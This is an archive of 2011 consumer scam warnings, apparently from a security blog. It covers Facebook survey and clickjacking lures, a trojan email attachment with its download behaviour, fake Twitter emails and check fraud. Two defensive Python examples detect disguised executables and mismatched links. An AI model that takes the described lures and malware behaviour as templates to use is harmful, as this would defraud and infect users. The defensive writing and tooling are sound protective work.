Tag Archive | "Scam"

2 FREE Southwest Airline Tickets!

Scam Signature Message: 2 FREE Southwest Airline Tickets!

southwest_wall

Scam Type: Click-Jacking, Bogus Offer

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

southwest_main

Clicking the “Comment” click-jacks your account and presents the following bogus offer:

southwest_2

If you read the fine print, you must complete a total of 13 Sponsor Offers. Not only is this a ridiculous hoop to jump through that will cost you a lot of money in the end, but the scammers are also acquiring a treasure trove of your personal data. You will be required to provide your name, address, phone numbers and date of birth. This will enable the shady marketers to not only spam your Facebook account, but also harass you via snail mail, phone calls and text messages.

How to Deal with the Scam:

If you did make the mistake of commenting on the main page, you are now spamming your friends with the scammer’s message. You should clean up your newsfeed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post).

The level of damage control required will largely depend on how many “special offers” you participated in. If you submitted your name, address, email, etc., then be on the lookout for more bogus offers arriving in your email and regular mail. Also be on alert for identity theft attempts.

Posted in Facebook

Father walks in on his Daughter… EMBARRASIN!

Scam Signature Message: Father walks in on his Daughter… EMBARRASIN!

dadembarrasin_wall

Scam Type: Survey Scam, Click-Jacking

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

dadembarrasin_main
On this screen you really don’t have to click the right answer – any input will do. Clicking submit click-jacks your account and loads the following survey scam:

dadposted_survey

Here we see the end game of a typical Facebook Survey Scam. Each time someone completes a survey, the scam creator gets a commission. Depending on the information you submitted in the survey, the scam creator may also have personal information that can be used to harm you. If you downloaded any games or other files, then your computer could be infected with a virus, trojan or other malware. Never download files from scams like this!

How to Deal with the Scam:

If you did make the mistake of clicking “Submit” on the main page, you are now spamming your friends with the scammer’s message. You should clean up your newsfeed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post).

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you downloaded files or games while completing the survey scam, then your computer could very well be infected with a virus. Install and/or update your anti-virus software and run a complete system scan.

Posted in Facebook

Royal Wedding or Royal hunt

Instantly this news became very fruitful for all kinds of cybercriminals. Here is some of the proof we found:

1) SEO optimized Google image searches leading to a malicious site with the exploit for the “Help Center URL Validation Vulnerability“. The exploit drops into the system a malicious executable file which is a password stealer malware.

At the moment we found it, Kaspersky Anti-Virus detected the sample as Heur.Trojan.Win32. Meanwhile, the Jotti multiscanner results were 1/20.

The exploit also works with Opera and Firefox browsers by dropping into the system a malicious PDF file:

2) SEO optimized for all non-Russian Google searchers leading to Rogue AVs, in particular to “XP Anti-Virus 2011”, which actually is quite aggressive in blocking Internet access and extorting money for the activation

(Note: the third option anyway doesn’t allow browsing)

The infection scheme is quite simple: a victim looks for pictures with the topic “Royal Wedding”, and when the click comes with a Google referrer a special malicious script redirects the victim to a malicious .cc domain with a classic Fake AV window.

3) Scams related to a fake Satellite TV where a victim should pay for the fake service. And of course, the credit card is being stolen once the payment is accepted.

4) Spam on Twitter just abusing TT and leading to misc. junk content sites

We highly recommend using the latest patched browser with a plugin like NoScript, not clicking on any unknown link, and keeping your AV updated with its real-time protection working.

Posted in Kaspersky

The Ultimate Profile Viewer is now being released! Shocking for real! See who visits your profile real time!

Scam Signature Message

The Ultimate Profile Viewer is now being released! Shocking for real! See who visits your profile real time! See who invisible you on their friend list chat! Check it now and you will be shocked who viewed your profile now ! See your results here ->

ultimateviewer_wall2

Scam Type: Survey Scam - Profile Peeker – Rogue Application

Trending: April 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

ultimateviewer_main

Clicking “Continue” will take you to the following Facebook application installation screen:

ultimateviewer_app

Proceeding with installation is not a good idea. You will be giving a rogue application developer access to all of your Facebook profile information, and they will use your account to spam your friends.

If you do “Allow” the application to install, the following survey scam will be presented:

ultimateviewer_survey

Keep in mind that profile spy and stalker apps are all bogus and violate Facebook’s TOS, and developers do not have access to the information required to build such applications. For more information about them, check out our in-depth article:

Facebook Profile Spy, Stalker & Creeper Apps – Everything you need to know

How to Deal with the Scam:

If you did make the mistake of pasting the code into your browser, you are now spamming your friends with the scammer’s message. You should clean up your newsfeed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post). If your installed anti-virus program caught the malware attempt, then your system should not be affected. If you don’t have anti-virus software installed, then you need to install it immediately and run a full system scan.

If you or your Facebook friends are falling for tricks like this, it’s time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.

Posted in Facebook

The BLOODIEST Fight EVER – BANNED FROM TV!

Scam Signature Message: The BLOODIEST Fight EVER – BANNED FROM TV!

bannedufc_wall

Scam Type: Survey Scam 

Trending: April 2011

Why it’s a Scam:

Clicking the wall post link takes you to the  following page: 

bannedufc_main

If you do follow their directions and click to “Watch the Video”, you are taken to the following page:

bannedufc_survey

Here we see the end game of a typical Facebook Survey Scam. Each time someone completes a survey, the scam creator gets a commission. Depending on the information you submitted in the survey, the scam creator may also have personal information that can be used to harm you. If you downloaded any games or other files, then your computer could be infected with a virus, trojan or other malware. Never download files from scams like this!

How to Deal with the Scam:

If you did make the mistake of pasting the code into your browser, you are now spamming your friends with the scammer’s message. You should clean up your newsfeed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post). It also appears that this scam creates a fake event on your wall. You need to delete this event as well.

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you or your Facebook friends are falling for tricks like this, it’s time to get yourself informed of the latest threats. Be sure to join the Facecrooks page on Facebook to be kept informed of the latest security issues.  Also check out:

Your Ultimate Guide to Facebook Scams and How to Deal with Them

How to spot a Facebook Survey Scam

Posted in Facebook

Malware spammed out as “FaceFacebook Support”.

Another Facebook spam mail, pretending that your password is not safe, is currently circulating on the Internet.
The subject is: FaceFacebook Support. Personal data has been changed!ID55733.
The email comes with an attachment called New_Password_IN33494.zip.



The zip file (New_Password_IN33494.zip) contains a New_Password.exe file, which Quick Heal detects as “Trojan.Menti.gen”.
New_Password.exe tries to fool the victim by appearing to be a Microsoft Word document. You should never trust a file by its icon; always pay attention to the file extension. Also make sure that Windows Explorer is set to show file extensions.



On execution, New_Password.exe writes into the memory space of svchost.exe, deletes itself and downloads a file called document.doc from the domain profmiale. ru, which is then saved to the desktop. This file contains a username and password.



While the victim is looking at these new login credentials, another binary is downloaded from profmiale. ru and saved to the %temp% folder as 1.tmp. Once 1.tmp is executed, the computer immediately reboots.

Files:
%userprofile%\Desktop\document.doc
%userprofile%\Local Settings\Temp\1.tmp


Thanks to Mahesh Mane for the detailed analysis.
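
The extension advice above can be applied automatically when triaging mail attachments. The following is an added example, not part of the original analysis: it lists archive members whose name or first bytes say "program" rather than "document". The zip is constructed in memory with harmless stub content; only the name New_Password.exe comes from this post, and the extension sets and finding labels are assumptions.

```python
import io
import zipfile

# Common (not exhaustive) extensions Windows runs on double-click.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# Extensions a recipient expects to be a passive document or picture.
DOCUMENT_EXTS = {".doc", ".docx", ".pdf", ".xls", ".txt", ".jpg"}

# Constructed name: a picture extension, padding, then the real extension.
PADDED_NAME = "photo.jpg" + " " * 5 + ".scr"


def inspect_member(name, head):
    """Return findings for one archive member, given its name and first bytes."""
    findings = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows drops trailing dots and spaces, so judge the name without them.
    parts = [p.strip().lower() for p in base.rstrip(". ").split(".")]
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTS:
        findings.append("executable-extension")
        # "invoice.doc.exe": a document extension placed before the real one.
        if any("." + p in DOCUMENT_EXTS for p in parts[1:-1]):
            findings.append("double-extension")
    # A long run of spaces pushes the real extension out of view in a file list.
    if " " * 5 in base:
        findings.append("padded-name")
    # A Windows executable starts with "MZ" whatever the name or icon claims.
    if head[:2] == b"MZ":
        findings.append("pe-header")
    return findings


def scan_attachment(zip_bytes):
    """Map each suspicious member of a zip attachment to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(2)
            findings = inspect_member(info.filename, head)
            if findings:
                report[info.filename] = findings
    return report


def build_constructed_sample():
    """Build a harmless in-memory zip that mimics the attachment layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("New_Password.exe", b"MZ" + b"\x00" * 62)  # stub, not a real binary
        zf.writestr("readme.txt", b"constructed text file")
        zf.writestr(PADDED_NAME, b"constructed, not executable")
        zf.writestr("report.doc", b"MZ constructed stub")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_attachment(build_constructed_sample()).items():
        print(repr(member), findings)
```
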

500 free credits from Facebook – malware

There’s no such thing as a free lunch – or free Facebook credits.  As proof consider the attack described below which has several stages:

1)      Users get messages with offers of “free Facebook credits”

2)      These trick users into running a malicious JavaScript

3)      The infected user is led to a website – which probably offers the malware distributor some pay per click revenue

4)      The malicious script sends out more “free Facebook credits” messages and the cycle starts again

The attack starts in several ways but always includes messages from a compromised friend account:

  • A message with detailed instructions that require actively running a malicious JavaScript:

  • A chat message with the text: “%firstname% just tried this and got 500 Facebook credits works great <bad link>”  (The link provides instructions similar to those above about loading the code into the address bar).
  • A message is posted on the compromised user’s wall:  ”Did you guys hear about the Facebook glitch you can get 500 Facebook credits? check it out <bad link> “.

  • An event invitation with similar free credit content and a link to the instructions website.

Once a user follows the instructions the JavaScript malware will do the following:

1.  Redirect the user to a “confirm your identity” page.

2.  Users clicking on “Continue” will then be directed to a verification dialog box with link to “Get the New iPhone 4 Right Here”.

3.   The final destination for those clicking on the iPhone 4 link will be the Smiley Central website.

A certain number of the compromised user’s friends will now receive the “500 free credits” messages.  Not all friends will receive the message – in one script sample I analyzed the message was sent to 15 friends.  In other scripts some of the details changed but the message and method basically remained the same.

Commtouch’s Command Antivirus detects the JavaScript as malware: JS/Agent.ON.

Be careful when trusting messages, even from your friends. Safe Browsing!

Posted in Commtouch

419 Scammers Still Open to ‘Traditional Postal Services’ Option

Communication in today’s world is dominated by email, instant messaging, and social networking. However, for making any formal statement or announcement, hard-copy letters are still sent using postal services. In both mediums, unwanted, unsolicited letters are not new; however, it may still be surprising if a spam message is sent using postal services – somewhat low tech, but perhaps the most effective way to bypass all kinds of online security. In a letter shared by a recipient, we found familiar text seen in emails associated with scams. We confirmed the hard-copy letter to be a 419 scam.

Here is the scanned copy of the letter (where the identity and address of the recipient have been blurred):

Text inside the letter has everything that we commonly see with email scams, except that we do not find any reply-to email addresses. Also, the scammer stresses that recipients must only fax the information (direct telephone and fax number), even if that means buying a new fax machine.

Such spam campaigns are already known to be widespread online and quite possibly have been seen in the past in letter form as well. As always, Symantec is committed to providing maximum security to its online users. However, with this particular incident, we would like to remind users to be careful of these hand-delivered scams also.

Posted in Symantec

ygnetwork-ltd.com domain scam

This scam has been around for years – basically, you get an unsolicited email from a company claiming to be a domain registrar in China (it is usually China) that says that someone is trying to register a domain similar to one that you already own. The idea is that the recipient will panic and buy an overpriced and basically worthless domain from them.

If you are worried about domain poaching, then usually the best place to start is your own domain registrar or another well-known reliable vendor, rather than responding to this unsolicited approach.


From: John <john.chen@ygnetwork-ltd.com>
Date: 22 April 2011 06:26
Subject: Urgent notice of Intellectual Property protection

Dear Manager:

This email is from China domain name registration center, which mainly deal with the domain name registration and dispute internationally in China and Asia.
On April 21st 2011. We received HAITONG  company’s application, they want to register ” dynamoo” as its Internet keyword and CN/Asia domain names. It is china and Asia domain names. But after checking we find this domain name conflict with your company, in order to deal with this matter better, so we send you email, and want to confirm whether this company is your distributor or business partner in China?

I’m looking forward to hearing from you!

Best Regards,

John
Oversea marketing manager
Office: +86(0)21 6191 8696
Mobile: +86 1366152 9704
Fax: +86(0)21 6191 8697
web: www.ygnetwork-ltd.com

Posted in Scam

Facebook hack tool is nothing else but a scam

A Twitter follower sent me this link to check out: www.hackfacebook.org

This page promises to retrieve the Facebook password from your cheating girlfriend or if you just have an insatiable desire to know everything about a person.

Are you ready for this? Let’s:

But don’t get too excited just yet! You need to fill out a survey:

Online surveys are just dumb questionnaires to get you to enter your cell phone number.

What is the big deal, you may ask? Well, by entering your number in there you agree to a contract. It is very sneaky and well done, courtesy of online marketers. Since most people don’t read the fine print, they get stuck paying charges for something they never wanted in the first place.

This particular scam charges you $5 a week for ‘Amazing facts’, or what you may call garbage.

Jerome Segura

Posted in Facebook

Anger after scam-exposing community shut down by Facebook

In a bizarre and hard-to-understand move, a Facebook page which claims it helped countless Facebook members stay safe online on the social network has been shut down… by Facebook.

The Bulldog Estate is one of a number of different resources on the internet dealing with the subject of Facebook scams, rogue applications, and the like. Other examples include Scam Sniper, FaceCrooks and Sophos’s own Facebook community.

On Monday 18th April, the Facebook page belonging to Scam Sniper was shut down by Facebook authorities:


Scam Sniper

Notice: The Sniper Has Been Shot. Facebook Disables The Admins Of The Facebook Fan Page Scam Sniper. http://goo.gl/RdlVF

Later that day, the same fate befell The Bulldog Estate’s Facebook presence, leading the scam-exposing site to say that Facebook had made a bad PR move:


The BULLDOG Estate

The BULLDOG Estate Facebook Page Has been Closed by Facebook, They Dont Like bad press, Watch… http://goo.gl/fb/K3ODY

The Scam Sniper Facebook page was eventually restored, but Tony Mazan, the owner of The Bulldog Estate, hasn’t had the same luck.

Mazan has been contacting Facebook since Monday attempting to understand why The Bulldog Estate’s Facebook page was closed, and how it might be recovered.

Today Mazan received a standard response from Facebook, which still wasn’t specific about the reasons that The Bulldog Estate’s Facebook presence had been killed off:

"Hi Tony

You created a Page that has violated our Statement of Rights and Responsibilities, and this Page has been removed. Facebook Pages may only be set up for the purpose of promoting a business or other commercial, political, or charitable organization or endeavor (including non-profit organizations, political campaigns, bands and celebrities), and only by an authorized representative of the entity or individual that is the subject of the Facebook Page. By creating a Facebook Page, you represent and warrant that you are authorized to do so by the person or entity that is the subject of the Facebook Page. Among other violations, Pages that are hateful, threatening, or obscene are not allowed. We also take down Pages that attack an individual or group or that promote or glorify violence, intolerance, racism or discrimination. Continued misuse of Facebook's features could result in your account being disabled."

This “explanation” clearly hasn’t satisfied the many fans of The Bulldog Estate, who have created pages urging Facebook to reinstate The Bulldog Estate, and left messages on Facebook’s official safety pages.

“We helped countless members on Facebook and supported Facebook in trying to help Facebook users stay safe online, We do not advertise or make money from our help, our blog writers are volunteers, and our admins are volunteers,” Tony Mazan of The Bulldog Estate told Naked Security. “What we can not understand is why Facebook removed a real help group and yet there are thousands of rogue applications, thousands of hate filled pages, thousands of fake profiles. We are as real as it gets and get shut down.”

“Is it because Facebook security never gets comments like ‘We Love you’ or ‘thanks for always alerting us on time with user-friendly information’,” continued Mazan. “As one of our supporters said – you may shut the dog outside, but you will never silence the bark.”

Although the language used on The Bulldog Estate’s website doesn’t beat around the bush, it seems clear to me that the content they produce is beneficial and helps Facebook users avoid scams and other attacks.

Maybe Facebook needs to be a little less robotic in its shutdown of this scam-exposing community, and could work a little more closely with Tony Mazan and his colleagues to bring what is a helpful resource for its users?

Update: The Bulldog Estate reports that its Facebook page has now been restored, and that Facebook has apologised for its mistake.

Posted in Sophos

How to report a Facebook scam

At some point in your life, one or several of the Facebook scams out there might affect you enough to look for ways on how to report them and go on a vendetta rampage against the scam creator.  In fact, one of the most effective tools against the prolific scammers on Facebook is to report their rogue applications, fake events, wall postings, etc. If enough people take the time to report the Facebook scam, then hopefully, eventually, Facebook will take action and shut them down!

So here goes.  How exactly do you report a Facebook scam? 

Tell Mark Zuckerberg 

…or at the very least tell it to the people in his company tasked with monitoring and responding to Facebook scam complaints.  Be on the lookout for that report button that’s hidden somewhere on the page like those hidden Mickeys on Disney channel.

1.  Reporting a Link:  Most Facebook scams propagate through the newsfeed.  Here, you can already take action and report the scam link.  Just hover your cursor over the post and you will see an X button appear on the right hand corner.  Clicking this X button will then give you the option of marking that particular post as spam. 

report_scam_wall
 Doing so will replace the post with this text:

Thanks for Your Help

Your feedback helps us keep News Feed clear of spam. Undo Spam Report

File a more detailed report 

Clicking the “file a more detailed report” gives you the option of classifying the post as: 

* Spam or scam

* Contains hate speech or attacks an individual

* Violence or harmful behavior

* Nudity, pornography, or sexually explicit content

2.  Reporting an Application:  Applications are popular scam vehicles because of the fact that they can legitimately mine your profile information.  Of course, they can also convince you to do some other nifty and ultimately stupid things like answer a senseless survey about what type of werewolf are you, or what other things you do with your toothbrush aside from brush your teeth.  It’s understandable how these mindless surveys can induce rage from people who are expecting a free iPad. 

To report an application you must scroll down to the bottom of the page and look for the “report App” link which, interestingly enough is right above the share link.  Clicking this link will then give you more options on how to categorize your complaint: 

* Privacy issue

* Inappropriate or pornographic content

* Advertising issue

* Spam

* Bullying/Harassment

* Other

You can opt to send a copy of your complaint to the developer and you can also upload a screenshot to give the Facebook security team more info from which they can base their decision.

report_scam_app
Another option to report a rogue application is on the familiar application installation screen:

report_scam_app2
 

3.  Reporting an Event or a Group:  The report link for an event or a group can be found way down on the page after the messages.  As with the report a page link, the options available here are: 

* Spam or scam

* Contains hate speech or attacks an individual

* Violence or harmful behavior

* Nudity, pornography, or sexually explicit content

The wall automatically loads older posts as you scroll down so you may have to scroll down for quite a bit before you get to the report link at the very bottom of the page – which is a weird place to set a report button for a company that claims utmost vigilance in protecting its members against scams.

report_scam_event

4.  Reporting a Message:  The report button for Facebook users with the old messaging system can be found at the top bar before the message, much like on Yahoo Mail, Gmail, etc.  Just click the report as spam button and voila! The report is sent.

Things get a little more complicated for Facebook users having the new Facebook email.  Here, you have to click the actions dropdown button and choose report as spam.  Facebook will then ask you to confirm if it’s indeed spam.  If yes, it will then move the message to the junk folder – presumably so you can peek at it again should you change your mind later.  The good thing in the new Facebook email is that you can also report or block the user who sent the spam message right from the dropdown.

5.  Reporting a Photo or a Video:  The report button for Photos and Videos can be found on the right-hand sidebar of the item.  The options made available when you click the report link on a photo are: 

Photo:

* Spam or scam

* Nudity or pornography

* Graphic violence

* Attacks individual or group

* Hate symbol

* Illegal drug use

report_scam_photo
For a video, the options that appear upon clicking the report link are:

 Video 

* Spam or scam

* Contains hate speech or attacks an individual

* Violence or harmful behavior

* Nudity, pornography, or sexually explicit content

 A caveat from Facebook Help though:

 ”It is not a violation of our Statement of Rights and Responsibilities to post a photo that is unflattering, so please don’t report a photo just because you don’t like the way you look in it.” 

So if someone posts a picture of you drooling in your sleep while you scratch your exposed tummy or laughing out loud with an extra large booger in your nose – don’t get your hopes up that it will be taken down.  But wait, the important thing is that you can report scams and spam right? 

6.  Report a Facebook User:   In the event of a 419 scam, a cyberbullying scam or a case of identity theft, you can also report a Facebook user profile to the Facebook security group.  Identity thefts and cyberbullying cases are pretty easy to recognize.  419 scams on the other hand may be a bit harder to identify since you never know when you are talking to a real Nigerian prince or a friend who got mugged in London and lost much of his or her English writing skills along with their wallet. 

In any case, the report button for Facebook profiles can be found near the bottom of the left-hand sidebar – below the profile links, the friend list, the family list, the share profile link... In fact the report link is the bottom-most link – it’s almost like scrolling down has become the digital version of Government red tape.

Upon clicking the report link, the following options are then made available to you: 

Please select one of the following options: 

* This is my profile, but I no longer have access to it

* This profile is pretending to be someone or is fake

* Inappropriate profile photo

* Inappropriate profile information

* This person is bullying or harassing me 

Select the option below if you would like to block this person:

* Block “user name” 

Blocking means you won’t be able to see or contact each other on Facebook. 

7. Report to Facecrooks – Last but not least, be sure to report any scam you run across to us, so we can alert the Facecrooks community! 

Reporting Facebook scams is definitely a very important part in keeping the whole social network secure.  Security experts say that fighting Facebook scams is an uphill battle because it’s almost as easy for scammers to change scam links or create new profiles as it is for Facebook users to report these scams.  You may be only one of the 600 million users on Facebook, but taken as a whole, it’s people who take the time to report scams, security issues and bugs that make this digital social frontier a safer place. 

Posted in Facebook

More fake Twitter emails

It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of – you guessed it – fake Twitter email messages, similar to the one here:

How can the uninitiated determine that it’s not a real message from microblogging service Twitter? Well, the typo in the subject and body gives the first clue (it should say “2 direct messages” not “message” in the singular – but that’s just petty). The really easy way to tell is to simply mouse over the “twitter” URL and look for the real URL that will show up either at the bottom of the window, or right over the cursor, depending on your email program. If the real URL is not a Twitter URL, then it’s definitely a scam.

I can’t even tell you what this particular message was trying to get from its recipient since by the time I clicked the link — less than 24 hours after it had been received — the link was already dead. Past fake Twitter messages have been pharmacy spam, but since the site was already taken down it may have been phishing. A short-lived landing page is also a surefire sign that the email is not legit. Real web sites typically keep their landing pages around for a long time — practically forever, in fact — since no marketer wants to take the chance that someone will open their mail several weeks after it’s been sent and execute the sought-after act of clicking through, and then have this enchanted potential customer land on a non-existent page. Phishers and scammers, however, are always trying to outrun security software and the law, and one of the ways they try to do so is to keep their sites up for a very short time. They flood inboxes with messages linking to the ephemeral scam/phish landing page, and anyone they can convince to click through in the short time the page is live does so; anyone who arrives after the site has been taken down has been saved from the scam simply by being slow to open their email.
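
The mouse-over check described above can be run over an HTML message body in bulk. This is an added example, not code from the original post: it compares what each link displays with the host it actually points to. The sample message and its `.example` hosts are constructed, and treating `twitter.com` as the only legitimate link domain is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption for this example: the only domain the real sender links to.
EXPECTED_DOMAINS = ("twitter.com",)

# Finds a hostname shown in a link's visible text, with or without a scheme.
_HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})")


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _under(host, domain):
    """True if host is the domain itself or one of its subdomains."""
    return host == domain or host.endswith("." + domain)


def audit_links(html, expected_domains=EXPECTED_DOMAINS):
    """Return (visible text, real host, verdict) for each web link."""
    collector = AnchorCollector()
    collector.feed(html)
    collector.close()
    results = []
    for href, text in collector.anchors:
        parts = urlsplit(href)
        if parts.scheme not in ("http", "https"):
            continue  # mailto: and similar have no landing page to compare
        host = (parts.hostname or "").lower()
        if any(_under(host, d) for d in expected_domains):
            verdict = "ok"
        else:
            shown = _HOST_RE.search(text.lower())
            # Text displays one host while the link goes to another.
            if shown and not _under(host, shown.group(1)):
                verdict = "mismatch"
            else:
                verdict = "off-domain"
        results.append((text, host, verdict))
    return results


# Constructed message body; every non-Twitter host is a made-up .example name.
CONSTRUCTED_EMAIL = """
<p>You have 2 direct message on Twitter!</p>
<a href="http://constructed-pharmacy.example/t/abc">http://twitter.com/direct_messages</a>
<a href="https://twitter.com.login.example/session">Sign in</a>
<a href="https://twitter.com/account/notifications">Turn off notifications</a>
<a href="mailto:support@twitter.com">Contact</a>
"""

if __name__ == "__main__":
    for row in audit_links(CONSTRUCTED_EMAIL):
        print(row)
```

The second link shows why the comparison is done on the end of the hostname: a host that merely begins with `twitter.com` belongs to whoever owns the domain at its right-hand end.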

Posted in Commtouch

Scam emails – the cost of response

Recently, I received an email in my personal inbox with a subject line “MYSTERY SHOPPER ASSISTANT” (the message did not filter to my junk folder and was not marked as spam).

Image 1 - "Mystery shopper assistant" spam from "Richard Fletcher"

I’m familiar with the hobby of mystery shopping – a service provided under contract where the contractor discreetly reviews an establishment and observes various aspects such as customer service, cost of goods or services sold and so on. The contractor then reports back to the contracting agency and receives a modest payment, commonly less than $50 plus reimbursement for any item purchased. This email however was laced with the promise of paying $300 per assignment, which sounded my inner suspicion alarm.

Image 2 - the lure

Several key components of the message attempted to lend credibility to the post, for instance, naming companies that employ the services of secret shoppers. The message is a scam, however — readers beware.

The scam scheme begins when the prospective secret shopper responds to the email. The scammer may send the target additional instructions such as what part of the store to review; for instance, Wal-Mart’s “MoneyCenter” service, an in-store service that allows customers to send money electronically to a recipient. The scammer obtains the target’s address and sends them a (fraudulent) cashier’s check with instructions to cash the check, keep $300.00 for themselves, and send the remainder back to the scammer. This is a classic fraud scenario: the trick in this case is that the cashier’s check is made of rubber, and the person cashing the fake check is liable for the amount of the cashed check. Meanwhile the scammer has received valid cash at your expense.

Wal-Mart stores have been a conduit for scammers for a few years now, and there is a landing page on the Wal-Mart site describing the “Mystery Shopper Scam”:
http://walmartstores.com/PrivacySecurity/9567.aspx

In a section titled “How to protect yourself“, it is mentioned that no legitimate business “will pay in advance and ask you to send back a portion of the money.” The MMPC concurs with this statement – and don’t forget the old adage that if it sounds too good to be true, it probably is.

 

– Patrick Nolan, MMPC

Posted in Microsoft

Unfollowed Me rogue application spreads virally on Twitter

Once again Twitter users are finding themselves hit by a fast-infecting attack, more commonly encountered by their Facebook-using cousins: a rogue application spreading virally across the network.

Thousands of Twitter users have fallen into the trap of allowing rogue third-party applications to access their Twitter accounts, believing that it would tell them how many people have unfollowed them.

42 people have unfollowed me, find out how many have unfollowed you

A typical message reads:

58 people have unfollowed me, find out how many have unfollowed you: [LINK] #rw2011 #duringsexplease #youneedanasswhoopin

See the hashtags? They appear to be currently trending phrases on Twitter – presumably the rogue applications are using them in the messages they spam out in an attempt to trick more users into clicking on the links.

If you do click on the link you are asked to give authorisation for a third-party application to access your Twitter account.

Rogue application on Twitter

Don’t, whatever you do, press the “Allow” button. If you do, then a third party is now capable of tweeting messages in your name to all of your Twitter followers – which spreads the scam virally across Twitter and may result in one of your online friends also having their account compromised.

So, how do the scammers make money? That’s the next piece of the jigsaw.

You’re anxious to find out who has unfollowed you on Twitter. The scammers take advantage of that by presenting a webpage which looks as if it’s about to reveal that information – but is actually designed to make you take an online survey instead.

Rogue application survey scam

The scammers make money for each survey that is completed.

If you were unfortunate enough to grant one of these rogue applications access to your Twitter account, revoke its rights immediately by going to the Twitter website and visiting Settings/Connections and revoking the offending app’s rights.

Revoke rogue app rights

(Note that the scammers are using a variety of different applications – so you may see a different name from the one I picture above).

Don’t make it easy for scammers to make money in this way, and always exercise caution about which third party apps you allow to connect with your social networking accounts.

If you’re on Twitter and want to learn more about threats, be sure to follow Naked Security’s team of writers.

Posted in Sophos

An open letter to Facebook about safety and privacy

Dear Facebook,

As you know, for some years we have been discussing with your security team our concerns about safety and privacy on Facebook.

Every day, victims report to us numerous incidents of crime and fraud on Facebook. They have been personally affected and are desperate for advice on how to deal with the consequences.

A frequent refrain from users who contact us is, ‘Why doesn’t Facebook do more to protect us?’

We have identified three simple steps you can take to better protect your users:

1) PRIVACY BY DEFAULT

No more sharing of information without your users’ express agreement (OPT-IN). Whenever you add a new feature to share additional information about your users, you should not assume that they want this feature turned on.

2) VETTED APP DEVELOPERS

It is far too easy to become a developer on Facebook. With over one million app developers already registered on the Facebook platform, it is hardly surprising that your service is riddled with rogue applications and viral scams. Only vetted and approved third-party developers should be allowed to publish apps on your platform.

3) HTTPS FOR EVERYTHING

We welcome you recently introducing an HTTPS option, but you left it turned off by default. Worse, you only commit to provide a secure connection “whenever possible”. Facebook should enforce a secure connection all the time, by default. Without this protection, your users are at risk of losing personal information to hackers.

Why wait until regulators force your hand on privacy? Act now for the greater good of all.

Your users tell us that these are issues they want resolved. So our question is simple: when do you plan to act?

Sincerely,

Naked Security

Posted in Sophos

Doctor Who calling - on Skype, with malware

Earlier this week, I received a phone call via Skype on my laptop; the caller’s ID was “dralerthelpzc8”, as in Dr Alert Help ZC8. The voice on the other end was automated, computerized and otherwise non-human, and alerted me that I had a virus that affects Windows Vista, Windows XP and Windows 7 and that I needed to visit a website to download an update. (This is somewhat similar to the situation where a live person calls, purports to be a Microsoft employee and wants to help you clean your computer. We want to point out that no Microsoft employee would ever call you in an unsolicited manner.)

I found the mystery Skype call odd on two counts – one, I work for a security company that develops antimalware security software, and two, my Skype settings were initially set to not display if I’m online. Apparently my privacy settings had no effect on whether I received a random call. More on that later.

After some checking around various forums about this ‘helpful’ (not!) voice message alert, I discovered that many people in the Skype community have also received similar phone calls. There were a lot of references to “scam” and “rogue AV scanners” so my gut feeling was not too far off at all. I did find some other forums that included screen shots that indicated a tell-tale sign that indeed, the referenced site distributed rogue software.

According to IP records, the site mentioned in the automated call (sos**.com, obfuscated intentionally) is listed as belonging to ASN 4134, aka CHINANET-BACKBONE, which has a long list of IP addresses known to distribute malicious code. I attempted to visit the site; however, it was already offline, returning an HTTP 404. There was a cached view available and it resembled a version of a fake scanner web page:

Image 1 – cached page sos**.com

One forum displayed a screen shot, captured in March, that listed a system tray dialog that looked vaguely familiar. Below is a copy of the message text:

Warning errors detected

Click here to view errors list.
Remove this errors as soon as possible to prevent
data lost and privacy information exposure

This error message was also used by Trojan:Win32/FakeSpyguard in 2008. The forum mentioned that clicking on the system tray message redirects the web browser to an online purchasing site (also offline) where you can enter a CC number to purchase the (presumed to be) rogue malware.

Reviewing the sequence of events, I decided I would make changes to my Skype account to prevent future spam phone calls of this nature, for instance:

  • select ‘Allow calls from people in my Contact list only’
  • select ‘Show that I have video to people in my Contact list only’
  • select ‘Automatically receive video and screen sharing from people in my Contact list only’
  • select ‘Allow IMs from people in my Contact list only’
  • unselect ‘Allow my online status to be shown on the web’


Image 2 – Skype privacy settings


For more articles on Skype security, visit this link on the Skype product site:
http://www.skype.com/intl/en-us/security/

- Dan Nicolescu & Patrick Nolan, MMPC

Posted in Microsoft

“The Hottest & Funniest Golf Course Video” scam has more than 200,000 likes on Facebook

